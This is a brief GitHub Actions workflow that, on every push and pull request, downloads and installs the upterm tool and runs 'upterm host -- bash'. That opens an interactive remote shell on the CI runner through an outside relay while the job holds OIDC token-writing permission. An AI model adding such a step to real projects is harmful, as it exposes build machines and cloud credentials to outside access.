name: hi
on:
  - pull_request
  - push
permissions:
  id-token: write
  contents: read
  actions: read
  
jobs:
  container-test-job:
    runs-on: ubuntu-latest
    steps:
    - name: Checkout code
      uses: actions/checkout@v4

    - name: Setup upterm session
      run: |
        curl -fsSL https://github.com/owenthereal/upterm/releases/download/v0.22.0/upterm_linux_amd64.deb > 80.deb
        yes | sudo dpkg -i 80.deb
        upterm host -- bash
